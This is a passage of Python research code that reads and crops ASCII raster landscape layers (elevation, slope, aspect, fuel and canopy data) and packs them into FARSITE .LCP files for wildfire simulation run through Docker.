xll = float(lines[2].split(' ')[-1].split('\n')[0])
yll = float(lines[3].split(' ')[-1].split('\n')[0])
fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
xur = xll + fileDx*nCols
yur = yll + fileDx*nRows
Tf, iTf = getTransformFromMtoD()
queryPoint = iTf.TransformPoints([[lon,lat]])[0]
bounds = Tf.TransformPoints([[xll,yll],[xll,yur],[xur,yll],[xur,yur]])
centerX = int(np.round(nCols*(queryPoint[0]-xll)/(xur-xll)))
centerY = int(nRows)-int(np.round(nRows*(queryPoint[1]-yll)/(yur-yll)))+1
N = int(distance/fileDx)
if debug:
print("\tpoint\tx\t\ty")
print("\tll\t%.0f\t%.0f"%(xll,yll))
print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
print("\tur\t%.0f\t%.0f"%(xur,yur))
print("\tfull\t%.0f\t%.0f"%(nCols,nRows))
print('cen\t%.0f\t%.0f'%(centerX,centerY))
if centerY-N-2 > 0 and centerY+N+1 < nRows and centerX-N > 0 and centerX+N+1 < nCols:
#if xll < queryPoint[0] and xur > queryPoint[0] and yll < queryPoint[1] and yur > queryPoint[1]:
data = []
for i in range(6+centerY-N,6+centerY+N+1):
line = lines[i]
lineSplit = line.split(' ')[1:]
lineSplit[-1] = lineSplit[-1].split('\n')[0]
data.append(lineSplit)
data = np.array(data,dtype=np.float32)[:,centerX-N:centerX+N+1]
#data[data == noDataValue] = np.nan
header = ['ncols %.0f\n'%(2*N+1),
'nrows %.0f\n'%(2*N+1),
'xllcorner %.12f\n'%(queryPoint[0]-N*fileDx),
'yllcorner %.12f\n'%(yll+(nRows-(centerY+N))*fileDx),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f'%(noDataValue)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
else:
print("Point is not contained in file.")
print("\tpoint\tx\t\ty")
print("\tll\t%.0f\t%.0f"%(xll,yll))
print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
print("\tur\t%.0f\t%.0f"%(xur,yur))
data = None
stringHeader = None
return data,stringHeader
def readFullAscFile(file,lat=None,lon=None,debug=False):
with open(file,'r') as f:
lines = f.readlines()
nCols = float(lines[0].split(' ')[-1].split('\n')[0])
nRows = float(lines[1].split(' ')[-1].split('\n')[0])
xll = float(lines[2].split(' ')[-1].split('\n')[0])
yll = float(lines[3].split(' ')[-1].split('\n')[0])
fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
xur = xll + fileDx*nCols
yur = yll + fileDx*nRows
if lat is not None or lon is not None:
Tf, iTf = getTransformFromMtoD()
queryPoint = iTf.TransformPoints([[lon,lat]])[0]
centerX = int(np.round(nCols*(queryPoint[0]-xll)/(xur-xll)))
centerY = int(nRows)-int(np.round(nRows*(queryPoint[1]-yll)/(yur-yll)))
if debug:
print("\tpoint\tx\t\ty")
print("\tll\t%.0f\t%.0f"%(xll,yll))
print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
print("\tur\t%.0f\t%.0f"%(xur,yur))
print("\tfull\t%.0f\t%.0f"%(nCols,nRows))
print('cen\t%.0f\t%.0f'%(centerX,centerY))
if centerY > 0 and centerY < nRows and centerX > 0 and centerX < nCols:
check = True
else:
check = False
else:
check = True
data = []
if check:
for i in range(6,int(nRows+6)):
line = lines[i]
lineSplit = line.split(' ')
if lineSplit[0] == ' ':
lineSplit = lineSplit[1:]
lineSplit[-1] = lineSplit[-1].split('\n')[0]
if lineSplit[-1] == '':
lineSplit = lineSplit[:-2]
data.append(lineSplit)
data = np.array(data,dtype=np.float32)
#data[data == noDataValue] = np.nan
header = ['ncols %.0f\n'%(nCols),
'nrows %.0f\n'%(nRows),
'xllcorner %.12f\n'%(xll),
'yllcorner %.12f\n'%(yll),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f'%(noDataValue)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
else:
print("Point is not contained in file.")
print("\tpoint\tx\t\ty")
print("\tll\t%.0f\t%.0f"%(xll,yll))
print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
print("\tur\t%.0f\t%.0f"%(xur,yur))
data = None
stringHeader = None
return data,stringHeader
def queryAsciiFiles(lat,lon,distance,skipMissing=False):
inDir = 'E:/projects/wildfire-research/farsiteData/'
#names = ['US_SLP2010','US_140CBD','US_140CBH','US_140CC','US_140CH','US_140FBFM40','US_ASP2010','US_DEM2010']
names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40','US_140CC']
canopyNames = ['US_140CH','US_140CBH','US_140CBD']
groundNames = []
namespace = getNamespace(lat,lon,distance)
print(namespace)
fullDatas = []
fullNames = []
filenames = []
datas = []
headers = []
for name in names:
filename = inDir+name+'.asc'
extractedFile = inDir+namespace+'_'+name+'.asc'
if len(glob.glob(extractedFile)) == 0:
return None, None, None
data, header = readAscFile(filename,lat,lon,distance)
if data is not None and header is not None:
extractedFile = inDir+namespace+'_'+name+'.asc'
np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
else:
data, header = readFullAscFile(extractedFile,lat,lon)
datas.append(data)
headers.append(header)
filenames.append(filename)
fullDatas.append(datas)
fullNames.append(filenames)
datas = []
filenames = []
for name in canopyNames:
filename = inDir+name+'.asc'
extractedFile = inDir+namespace+'_'+name+'.asc'
if len(glob.glob(extractedFile)) == 0:
data, header = readAscFile(filename,lat,lon,distance)
if data is not None and header is not None:
extractedFile = inDir+namespace+'_'+name+'.asc'
np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
else:
data, header = readFullAscFile(extractedFile,lat,lon)
datas.append(data)
headers.append(header)
filenames.append(filename)
fullDatas.append(datas)
fullNames.append(filenames)
datas = []
filenames = []
for name in groundNames:
filename = inDir+name+'.asc'
extractedFile = inDir+namespace+'_'+name+'.asc'
if len(glob.glob(extractedFile)) == 0:
data, header = readAscFile(filename,lat,lon,distance)
if data is not None and header is not None:
extractedFile = inDir+namespace+'_'+name+'.asc'
np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
else:
data, header = readFullAscFile(extractedFile,lat,lon)
datas.append(data)
headers.append(header)
filenames.append(filename)
fullDatas.append(datas)
fullNames.append(filenames)
return fullDatas, headers, fullNames
def getAscFile(file):
with open(file,'r') as f:
lines = f.readlines()
nCols = float(lines[0].split(' ')[-1].split('\n')[0])
nRows = float(lines[1].split(' ')[-1].split('\n')[0])
xll = float(lines[2].split(' ')[-1].split('\n')[0])
yll = float(lines[3].split(' ')[-1].split('\n')[0])
fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
params = (nCols,nRows,xll,yll,fileDx,noDataValue)
return lines, params
def getNamespace(lat,lon,distance):
namespace = '%.4f_%.4f_%.0f'%(lon,lat,distance)
namespace = namespace.replace('-','n')
namespace = namespace.replace('.','-')
return namespace
def getCoordinateData(lines,params,lat,lon):
(nCols,nRows,xll,yll,fileDx,noDataValue) = params
xur = xll + fileDx*nCols
yur = yll + fileDx*nRows
Tf, iTf = getTransformFromMtoD()
queryPoint = iTf.TransformPoints([[lon,lat]])[0]
if checkPoint([[lon,lat]]):
centerX = int(np.round(nCols*(queryPoint[0]-xll)/(xur-xll)))
centerY = int(nRows)-int(np.round(nRows*(queryPoint[1]-yll)/(yur-yll)))+1
N = int(distance/fileDx)
data = []
try:
for i in range(6+centerY-N,6+centerY+N+1):
line = lines[i]
lineSplit = line.split(' ')[1:]
lineSplit[-1] = lineSplit[-1].split('\n')[0]
data.append(lineSplit)
except:
return None, None
data = np.array(data,dtype=np.float32)[:,centerX-N:centerX+N+1]
header = ['ncols %.0f\n'%(2*N+1),
'nrows %.0f\n'%(2*N+1),
'xllcorner %.12f\n'%(queryPoint[0]-N*fileDx),
'yllcorner %.12f\n'%(yll+(nRows-(centerY+N))*fileDx),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f'%(noDataValue)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
else:
data = None
stringHeader = None
return data, stringHeader
def extractListOfCoordinates(lats,lons,distance):
inDir = 'E:/projects/wildfire-research/farsiteData/'
names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40','US_140CC',
'US_140CH','US_140CBH','US_140CBD']
#names = ['US_140CC','US_140CH','US_140CBH','US_140CBD']
for name in names:
filename = inDir+name+'.asc'
lines, params = getAscFile(filename)
for lat, lon in zip(lats,lons):
data, header = getCoordinateData(lines,params,lat,lon)
if data is not None and header is not None:
namespace = getNamespace(lat,lon,distance)
extractedFile = inDir+namespace+'_'+name+'.asc'
np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
def limitAscLimits():
inDir = 'E:/projects/wildfire-research/farsiteData/'
names = ['US_DEM2010','US_SLP2010','US_ASP2010','US_140FBFM40']#,'US_140CC',
#'US_140CH','US_140CBH','US_140CBD']
#names = ['US_140CC','US_140CH','US_140CBH','US_140CBD']
limitXN = 30384
limitYN = 32938
limitXll = -2362425
limitYll = 1590585
limitYur = 2578725
limitXur = -1450905
for name in names:
filename = inDir+name+'.asc'
newFilename = inDir+name+'_limited.asc'
lines, params = getAscFile(filename)
nCols = float(lines[0].split(' ')[-1].split('\n')[0])
nRows = float(lines[1].split(' ')[-1].split('\n')[0])
xll = float(lines[2].split(' ')[-1].split('\n')[0])
yll = float(lines[3].split(' ')[-1].split('\n')[0])
fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
xur = xll + fileDx*nCols
yur = yll + fileDx*nRows
yOff = int((yur-limitYur)/fileDx)
xOff = int((xur-limitXur)/fileDx)
print(yOff,xOff)
header = ['ncols %.0f\n'%(limitXN),
'nrows %.0f\n'%(limitYN),
'xllcorner %.12f\n'%(limitXll),
'yllcorner %.12f\n'%(limitYll),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f\n'%(noDataValue)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
with open(newFilename,'w+') as f:
f.write(stringHeader)
for i in range(6+yOff,6+yOff+limitYN):
line = lines[i]
lineSplit = line.split(' ')[1:]
lineSplit[-1] = lineSplit[-1].split('\n')[0]
data = np.char.mod('%.1f',np.array(lineSplit,dtype=np.float32))
data = data[xOff:xOff+limitXN]
dataStr = ",".join(data)
f.write(dataStr+'\n')
#np.savetxt(newFilename,data, fmt='%.1f', delimiter=' ',newline='\n', header=stringHeader,comments='')
#for lat, lon in zip(lats,lons):
# data, header = getCoordinateData(lines,params,lat,lon)
# if data is not None and header is not None:
# namespace = getNamespace(lat,lon,distance)
# extractedFile = inDir+namespace+'_'+name+'.asc'
# np.savetxt(extractedFile,data, fmt='%.1f', delimiter=' ',newline='\n', header=header,comments='')
def parseLcpHeader(header):
headerDict = dict()
headerDict['nX'] = header[1037]; headerDict['nY'] = header[1038]
headerDict['eastUtm'] = header[1039]; headerDict['westUtm'] = header[1040]
headerDict['northUtm'] = header[1041]; headerDict['southUtm'] = header[1042]
headerDict['gridUnits'] = header[1043];
headerDict['xResol'] = header[1044]; headerDict['yResol'] = header[1045];
headerDict['eUnits'] = header[1046]; headerDict['sUnits'] = header[1047];
headerDict['aUnits'] = header[1048]; headerDict['fOptions'] = header[1049];
headerDict['cUnits'] = header[1050]; headerDict['hUnits'] = header[1051];
headerDict['bUnits'] = header[1052]; headerDict['pUnits'] = header[1053];
headerDict['dUnits'] = header[1054]; headerDict['wUnits'] = header[1055];
headerDict['elevFile'] = header[1056]; headerDict['slopeFile'] = header[1057];
headerDict['aspectFile'] = header[1058]; headerDict['fuelFile'] = header[1059];
headerDict['coverFile'] = header[1060]; headerDict['heightFile'] = header[1061];
headerDict['baseFile'] = header[1062]; headerDict['densityFile'] = header[1063];
headerDict['duffFile'] = header[1064]; headerDict['woodyFile'] = header[1065];
headerDict['description'] = header[1066]
return headerDict
def readLcpFile(filename):
with open(filename,'rb') as f:
data = f.read()
dataFormat = '=llldddd'
for i in range(0,10):
dataFormat = dataFormat+'lll%.0fl'%(100)
dataFormat = dataFormat+'llddddlddhhhhhhhhhh256s256s256s256s256s256s256s256s256s256s512s'
los = []
his = []
nums = []
values = []
names = []
header = struct.unpack(dataFormat,data[:7316])
crownFuels = header[0]; groundFuels = header[1]; latitude = header[2];
loEast = header[3]; hiEast = header[4]
loNorth = header[5]; hiNorth = header[6]
loElev = header[7]; hiElev = header[8]; numElev = header[9]; elevationValues = header[10:110]; los.append(loElev); his.append(hiElev); nums.append(numElev); values.append(elevationValues); names.append('Elevation')
loSlope = header[110]; hiSlope = header[111]; numSlope = header[112]; slopeValues = header[113:213]; los.append(loSlope); his.append(hiSlope); nums.append(numSlope); values.append(slopeValues); names.append('Slope')
loAspect = header[213]; hiAspect = header[214]; numAspect = header[215]; aspectValues = header[216:316]; los.append(loAspect); his.append(hiAspect); nums.append(numAspect); values.append(aspectValues); names.append('Aspect')
loFuel = header[316]; hiFuel = header[317]; numFuel = header[318]; fuelValues = header[319:419]; los.append(loFuel); his.append(hiFuel); nums.append(numFuel); values.append(fuelValues); names.append('Fuel')
loCover = header[419]; hiCover = header[420]; numCover = header[421]; coverValues = header[422:522]; los.append(loCover); his.append(hiCover); nums.append(numCover); values.append(coverValues); names.append('Cover')
if crownFuels == 21 and groundFuels == 21:
loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
numImgs = 10
elif crownFuels == 21 and groundFuels == 20:
loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
numImgs = 8
elif crownFuels == 20 and groundFuels == 21:
loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
numImgs = 7
else:
numImgs = 5
nX = header[1037]; nY = header[1038]
eastUtm = header[1039]; westUtm = header[1040]
northUtm = header[1041]; southUtm = header[1042]
gridUnits = header[1043];
xResol = header[1044]; yResol = header[1045];
eUnits = header[1046]; sUnits = header[1047];
aUnits = header[1048]; fOptions = header[1049];
cUnits = header[1050]; hUnits = header[1051];
bUnits = header[1052]; pUnits = header[1053];
dUnits = header[1054]; wUnits = header[1055];
elevFile = header[1056]; slopeFile = header[1057];
aspectFile = header[1058]; fuelFile = header[1059];
coverFile = header[1060]; heightFile = header[1061];
baseFile = header[1062]; densityFile = header[1063];
duffFile = header[1064]; woodyFile = header[1065];
description = header[1066]
bodyFormat = ''
for i in range(0,numImgs):
bodyFormat = bodyFormat+'%.0fh'%(nX*nY)
body = np.array(struct.unpack(bodyFormat,data[7316:]))
imgs = np.split(body,numImgs)
for i in range(0,numImgs):
img = body[i::numImgs]
img = np.array(img,dtype=np.float32)
img[img == -9999] = np.nan
imgs[i] = np.reshape(img,(nY,nX),order='C')
return imgs, names, header
def checkLcpFile(lcpFile=None,rawFiles=None,case=0):
if lcpFile is None or rawFiles is None:
if case == 0: # all data files
rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
'C:/FARSITE 4/Ashley/input/ash_slope.asc',
'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
'C:/FARSITE 4/Ashley/input/ash_canopy.asc',
'C:/FARSITE 4/Ashley/input/ash_height.asc',
'C:/FARSITE 4/Ashley/input/ash_cbh.asc',
'C:/FARSITE 4/Ashley/input/ash_cbd.asc',
'C:/FARSITE 4/Ashley/input/ash_duff.asc',
'C:/FARSITE 4/Ashley/input/ash_cwd.asc']
lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyFull.lcp'
elif case == 1: # first five data files
rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
'C:/FARSITE 4/Ashley/input/ash_slope.asc',
'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
'C:/FARSITE 4/Ashley/input/ash_canopy.asc']
lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyFive.lcp'
elif case == 2: # first five + 3 canopy files
rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
'C:/FARSITE 4/Ashley/input/ash_slope.asc',
'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
'C:/FARSITE 4/Ashley/input/ash_canopy.asc',
'C:/FARSITE 4/Ashley/input/ash_height.asc',
'C:/FARSITE 4/Ashley/input/ash_cbh.asc',
'C:/FARSITE 4/Ashley/input/ash_cbd.asc']
lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyCanopy.lcp'
elif case == 3: # first five + 2 ground files
rawFiles = ['C:/FARSITE 4/Ashley/input/ash_elev.asc',
'C:/FARSITE 4/Ashley/input/ash_slope.asc',
'C:/FARSITE 4/Ashley/input/ash_aspect.asc',
'C:/FARSITE 4/Ashley/input/ash_fuel.asc',
'C:/FARSITE 4/Ashley/input/ash_canopy.asc',
'C:/FARSITE 4/Ashley/input/ash_duff.asc',
'C:/FARSITE 4/Ashley/input/ash_cwd.asc']
lcpFile = 'C:/FARSITE 4/Ashley/input/ashleyGround.lcp'
imgs, names = readLcpFile(lcpFile)
for i in range(0,len(imgs)):
plt.figure(figsize=(20,4))
plt.subplot(1,2,1)
plt.imshow(imgs[i],cmap='jet'); plt.colorbar();
plt.subplot(1,2,2)
imgRaw, headerRaw = readFullAscFile(rawFiles[i])
imgRaw[imgRaw<-1000] = np.nan
plt.imshow(imgRaw,cmap='jet'); plt.colorbar();
def generateLcpFile(lat,lon,distance,indir,
gridUnits=0,
eUnits=0,
sUnits=0,
aUnits=2,
fOptions=0,
cUnits=1,
hUnits=3,
bUnits=3,
pUnits=1,
dUnits=0,
wUnits=0):
#datas, headers, names = queryAsciiFiles(lats,lons,distance)
if checkPoint([[lon,lat]]):
datas, headers, names = queryAsciiFiles(lat,lon,distance,skipMissing=True)
if datas is not None and headers is not None and names is not None:
sH = [float(x.split(' ')[-1]) for x in headers[0].split('\n')]
crownFuels = 21 if len(datas[1]) > 0 else 20
groundFuels = 21 if len(datas[2]) > 0 else 20
latitude = lat
nCols = sH[0]
nRows = sH[1]
westUtm = sH[2]
southUtm = sH[3]
xResol = sH[4]
yResol = sH[4]
eastUtm = westUtm + xResol*nCols
northUtm = southUtm + yResol*nRows
loEast = westUtm - round(westUtm,-3)
hiEast = loEast + xResol*nCols
loNorth = southUtm - round(southUtm,-3)
hiNorth = loNorth + yResol*nRows
#print(crownFuels,groundFuels,latitude,loEast,hiEast,loNorth,hiNorth)
dataFormat = '=llldddd'
header = struct.pack(dataFormat,crownFuels,groundFuels,int(latitude),loEast,hiEast,loNorth,hiNorth)
for i in range(0,5):
data = datas[0][i]
name = names[0][i]
if 'US_ASP2010' in name:
data[data < 0] = -9999
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
if crownFuels == 21:
for data in datas[1]:
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
if groundFuels == 21:
for data in datas[2]:
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header+struct.pack('=ll',int(nCols),int(nRows))
header = header+struct.pack('=ddddldd',eastUtm,westUtm,northUtm,southUtm,gridUnits,xResol,yResol)
header = header+struct.pack('=hhhhhhhhhh',eUnits,sUnits,aUnits,fOptions,cUnits,hUnits,bUnits,pUnits,dUnits,wUnits)
#print("Base five names:")
for name in names[0]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
if crownFuels == 21:
#print("crownFuel names:")
for name in names[1]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
if groundFuels == 21:
#print("groundFuel names:")
for name in names[2]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
description = 'Automatically generated. lat = %.4f, lon = %.4f, dist = %.0f'%(lon,lat,distance)
header = header + struct.pack('=512s',str.encode(description))
#print(len(header))
imgSize = int(nCols*nRows)
numImgs = int(len(datas[0])+len(datas[1])+len(datas[2]))
totalSize = int(imgSize*numImgs)
allImgs = np.zeros((totalSize))
ct = 0
for data in datas[0]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
for data in datas[1]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
for data in datas[2]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
allImgs = np.array(allImgs,dtype=np.int16)
dataFormat = '=%.0fh'%(totalSize)
body = struct.pack(dataFormat,*allImgs)
#print(len(body),totalSize)
#print(len(header)+len(body))
namespace = "%.4f_%.4f_%.0f"%(lon,lat,distance)
namespace = namespace.replace('-','n')
namespace = namespace.replace('.','-')
with open(indir+namespace+'.LCP','wb') as f:
f.write(header+body)
return datas, headers, names
else:
return None, None, None
def generateLcpFileTif(indir,names,outname,
gridUnits=0,
eUnits=0,
sUnits=0,
aUnits=2,
fOptions=0,
cUnits=1,
hUnits=3,
bUnits=3,
pUnits=1,
dUnits=0,
wUnits=0):
datas = []
headers = []
for name in names:
print("Reading %s"%(name))
file = gdal.Open(indir+name+'.tif')
band = file.GetRasterBand(1)
noDataValue = band.GetNoDataValue() if band.GetNoDataValue() is not None else -9999
nCols = file.RasterXSize
nRows = file.RasterYSize
xll = file.GetGeoTransform()[0]
yll = file.GetGeoTransform()[3]+file.GetGeoTransform()[5]*file.RasterYSize
fileDx = file.GetGeoTransform()[1]
header = ['ncols %.0f\n'%(nCols),
'nrows %.0f\n'%(nRows),
'xllcorner %.12f\n'%(xll),
'yllcorner %.12f\n'%(yll),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f'%(noDataValue)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
headers.append(stringHeader)
datas.append(np.reshape(band.ReadAsArray(),(nCols*nRows,)))
#assert False, "Stopped"
Tf, iTf = getTransformFromMtoD()
centerCoordinates = Tf.TransformPoints([[xll+fileDx*nCols/2,yll+fileDx*nRows/2]])[0][:-1]
#datas, headers, names = queryAsciiFiles(lat,lon,distance,skipMissing=True)
#if datas is not None and headers is not None and names is not None:
sH = [float(x.split(' ')[-1]) for x in headers[0].split('\n')]
crownFuels = 21 if len(datas) == 8 or len(datas) == 10 else 20
groundFuels = 21 if len(datas) == 7 or len(datas) == 10 else 20
print(crownFuels,groundFuels)
latitude = centerCoordinates[1]
nCols = sH[0]
nRows = sH[1]
westUtm = sH[2]
southUtm = sH[3]
xResol = sH[4]
yResol = sH[4]
eastUtm = westUtm + xResol*nCols
northUtm = southUtm + yResol*nRows
loEast = westUtm - round(westUtm,-3)
hiEast = loEast + xResol*nCols
loNorth = southUtm - round(southUtm,-3)
hiNorth = loNorth + yResol*nRows
#print(crownFuels,groundFuels,latitude,loEast,hiEast,loNorth,hiNorth)
dataFormat = '=llldddd'
header = struct.pack(dataFormat,crownFuels,groundFuels,int(latitude),loEast,hiEast,loNorth,hiNorth)
for i in range(0,5):
data = datas[0][i]
name = names[0][i]
if 'US_ASP2010' in name:
data[data < 0] = -9999
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
if crownFuels == 21:
for j in range(i,i+3):
packed, lo, hi, num, values = getHeaderInfo(datas[j])
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
j = i
if groundFuels == 21:
for i in range(j,j+2):
packed, lo, hi, num, values = getHeaderInfo(datas[i])
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header+struct.pack('=ll',int(nCols),int(nRows))
header = header+struct.pack('=ddddldd',eastUtm,westUtm,northUtm,southUtm,gridUnits,xResol,yResol)
header = header+struct.pack('=hhhhhhhhhh',eUnits,sUnits,aUnits,fOptions,cUnits,hUnits,bUnits,pUnits,dUnits,wUnits)
#print("Base five names:")
for name in names[0]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
if crownFuels == 21:
#print("crownFuel names:")
for name in names[1]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
if groundFuels == 21:
#print("groundFuel names:")
for name in names[2]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
description = 'Automatically generated california landscape file.'
header = header + struct.pack('=512s',str.encode(description))
#print(len(header))
imgSize = int(nCols*nRows)
numImgs = int(len(datas[0])+len(datas[1])+len(datas[2]))
totalSize = int(imgSize*numImgs)
print("Starting to write binary file.")
with open(outname,'wb') as f:
f.write(header)
for i in range(0,totalSize):
print(i)
for data in datas:
tmp = struct.pack('=h',int(data[i]))
f.write(tmp)
#allImgs = np.zeros((totalSize))
#ct = 0
#for data in datas:
# allImgs[ct::numImgs] = np.reshape(data,(imgSize))
# ct = ct+1
#allImgs = np.array(allImgs,dtype=np.int16)
#body = struct.pack(dataFormat,*allImgs)
#with open(outname,'wb') as f:
# f.write(header+body)
return datas, headers, names
def generateListLcpFiles(inDir):
files = glob.glob(inDir+'*US_DEM2010.asc')
for i in range(0,len(files)):#file in files:
file = files[i]
fSplit = file.split(os.sep)[-1].split('_')
lon = fSplit[0]
lat = fSplit[1]
distance = float(fSplit[2])
if lon[0] == 'n':
lon = -1*(float(lon.split('-')[0][1:])+float(lon.split('-')[1])/10000)
else:
lon = (float(lon.split('-')[0])+float(lon.split('-')[1])/10000)
if lat[0] == 'n':
lat = -1*(float(lat.split('-')[0][1:])+float(lat.split('-')[1])/10000)
else:
lat = (float(lat.split('-')[0])+float(lat.split('-')[1])/10000)
try:
datas, headers, names = generateLcpFile(lat,lon,distance,inDir)
except:
pass
def getHeaderInfo(data):
_,idx = np.unique(data.flatten(),return_index=True)
values = data.flatten()[np.sort(idx)]
if len(values) > 100:
values = values[0:100]
values[-1] = data.flatten()[-1]
num = -1
else:
num = len(values)
tmpData = np.zeros((100,))
tmpData[1:num+1] = np.sort(values)
values = tmpData
values = np.array(values,dtype=np.int16)
lo = int(data[data>-9999].min())
hi = int(data.max())
header = struct.pack('=lll100l',lo,hi,num,*values)
return header, lo, hi, num, values
def checkPoint(query,polygon=[[-125,42],[-122,34],[-112,36],[-114.5,44]]):
path = mpltPath.Path(polygon)
inside = path.contains_points(query)[0]
return inside
def runFarsite(commandFile):
dockerStart = 'docker run -it -v E:\\projects\\wildfire-research\\farsite\\:/commonDir/ farsite'
dockerCmd = './commonDir/farsite/src/TestFARSITE %s'%(commandFile)
p = subprocess.Popen('winpty '+dockerStart+' '+dockerCmd,shell=False, creationflags=subprocess.CREATE_NEW_CONSOLE)
p_status = p.wait()
def getFuelMoistureData(string,params,fuelModels=np.linspace(0,1,2)):
string = string+'FUEL_MOISTURES_DATA: %.0f\n'%(fuelModels.shape[0])
m1h = params['m1h']
m10h = params['m10h']
m100h = params['m100h']
lhm = params['lhm']
lwm = params['lwm']
for i in range(0,fuelModels.shape[0]):
